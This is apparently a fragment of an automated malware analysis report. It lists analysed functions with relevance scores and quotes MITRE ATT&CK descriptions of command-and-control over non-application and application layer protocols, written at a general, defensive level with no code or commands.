Function 06EFF1E0 Relevance: 2.8, Strings: 2, Instructions: 285
COMMON

Function 06E00040 Relevance: 2.6, Strings: 1, Instructions: 1335
COMMON

Function 07197B28 Relevance: 1.9, Strings: 1, Instructions: 610
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre